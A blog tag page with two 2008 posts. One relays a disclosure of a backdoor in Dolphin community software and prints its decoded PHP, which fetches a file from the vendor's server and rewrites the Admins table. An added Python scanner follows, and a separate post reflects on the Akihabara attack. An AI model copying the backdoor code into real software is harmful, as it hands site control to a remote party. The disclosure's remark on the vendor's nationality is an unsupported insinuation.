Posts Tagged ‘crime’

Dolphin Community Site Software, Security Backdoor

June 23, 2008

Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code – itself ineptly encoded to obfuscate itself – allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. This will then allow them to log in as Admin, giving them complete access to your website and, potentially, any database servers you are connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites and one can see the potential data mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):

—————————-

I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in “inc/admin.inc.php” (this is all on one very long line)

Do you know what it is?

I have just decoded it for you:

if( true || $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
   if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c' or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4') continue;
   if(true ||  strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
   foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) );
   if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
   echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 ) and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed'; exit; } break;
   }

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0, I would suggest you check your DB immediately.
Of course don’t forget to remove those lines from your code.

I have no idea about newer versions. I think it is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of the Dolphin.

Regards
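
A defensive check for the pattern the post describes, as an added example that is not part of the original post or of Dolphin's code: it scans PHP source text for long base64 string literals, decodes them, and flags any whose plaintext shows the behaviours seen in the decoded code above (a remote `file()` fetch over HTTP, writes to the `Admins` table, MD5-gated request parameters). The function names, the indicator patterns, the 40-character threshold and the sample input are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Runs of base64 characters long enough to hide a statement (threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Behaviours visible in the decoded code quoted in the post (pattern list is an assumption).
INDICATORS = {
    "remote_fetch": re.compile(r"file\s*\(\s*['\"]https?://", re.I),
    "admin_table_write": re.compile(r"(INSERT\s+INTO|DELETE\s+FROM)\s+`?Admins`?", re.I),
    "md5_gated_input": re.compile(r"md5\s*\(\s*\$\w+\s*\)\s*!?==", re.I),
}

def decode_candidate(blob):
    """Return the decoded text if blob is base64 for mostly printable text, else None."""
    blob = blob.rstrip("=")
    blob += "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("latin-1")
    printable = sum(c.isprintable() or c in "\r\n\t" for c in text)
    return text if text and printable / len(text) > 0.95 else None

def scan_php_source(source):
    """Return (offset, indicator names) for each encoded literal that hides flagged code."""
    findings = []
    for match in B64_RUN.finditer(source):
        decoded = decode_candidate(match.group(0))
        if decoded is None:
            continue
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
        if hits:
            findings.append((match.start(), hits))
    return findings

# Constructed sample: harmless stand-in text with the same shape as the decoded code.
SAMPLE_PLAINTEXT = (
    "if( md5( $sKey ) !== 'PLACEHOLDER' ) continue; "
    "$a = @file( 'http://vendor.example/' . $p ); "
    "db_res( \"INSERT INTO `Admins` SET `Name` = '{$a[1]}'\", 0 );"
)
SAMPLE_PHP = "<?php\n$blob = '" + base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode() + "';\n"

if __name__ == "__main__":
    for offset, hits in scan_php_source(SAMPLE_PHP):
        print(f"offset {offset}: {', '.join(hits)}")
```

A hit is a prompt to decode and read the literal by hand, and to compare the `Admins` table against the accounts you created yourself.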

Categories: Technology

Three minutes’ silence for the victims of Akihabara stabbing

June 9, 2008

Akihabara Incident

Regardless of creed or culture, there’s no denying the horror of the event that was witnessed in Akihabara on Sunday, where a man in his mid twenties hired a van in Shizuoka, several hours’ drive away, with the sole intention of ploughing it into a crowded pedestrian area, climbed out of his van and then proceeded to attack the crowd with a hunting knife. Of the people hit by the van and stabbed, seven died.

As one of my favourite areas in Japan, the reality that such an event could occur right here, under our noses, is horrific.

As a father and husband, the thought that such random violence can, at any time, intrude upon our lives and bring all that we have built, all that we cherish crashing to the ground, fills me with sadness. One of Japan’s major plusses, which I hold dearly above virtually all others, is the safety inherent in living here. The knowledge that even at night, it is safe to walk the streets with very little chance of being mugged for something as trivial as a pair of trainers or a mobile phone.

Instead, to have this heinous crime committed brings home the fact that no matter where you are, evil, real evil exists.

Evil Exists – You’re staring into its face right at this moment

If there is any good to come of this incident, then I believe it will come from the heightened awareness that a disaffected underclass exists beneath the surface of our society, and that disaffection and disassociation must be tackled at the source if we are to prevent such tragedies occurring again.

This, however, offers scant relief to the families of those affected, who must feel a pain and emptiness in their hearts that calls out for justice or revenge. I offer my sincerest hopes and wishes to all affected that their pain will be appeased, somehow.

Please, take a moment out of your busy schedule to reflect on this tragedy. For, small though it may seem in the ugly morass of destruction that we are forced to witness every day, it is very real to those whose lives were irrevocably changed on Sunday, 8th of June, 2008.

Categories: 3) Life